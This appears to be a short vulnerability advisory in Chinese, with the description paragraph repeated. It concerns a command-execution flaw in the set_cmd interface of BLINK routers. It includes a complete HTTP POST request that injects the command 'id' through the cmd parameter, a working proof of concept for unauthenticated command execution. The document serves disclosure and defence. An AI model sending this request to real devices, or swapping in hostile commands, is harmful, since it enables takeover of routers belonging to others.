Description
BLINK routers 是由 BLINK 公司生产的路由器设备,广泛应用于家庭和企业网络中。BLINK routers 的 set_cmd 接口存在命令执行漏洞,攻击者可以通过控制 cmd 参数的值,在设备上执行任意命令,从而获取服务器权限,导致设备被完全控制。
BLINK routers 是由 BLINK 公司生产的路由器设备,广泛应用于家庭和企业网络中。BLINK routers 的 set_cmd 接口存在命令执行漏洞,攻击者可以通过控制 cmd 参数的值,在设备上执行任意命令,从而获取服务器权限,导致设备被完全控制。
POST /goform/set_cmd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Connection: close
Content-Length: 6
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
cmd=id
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.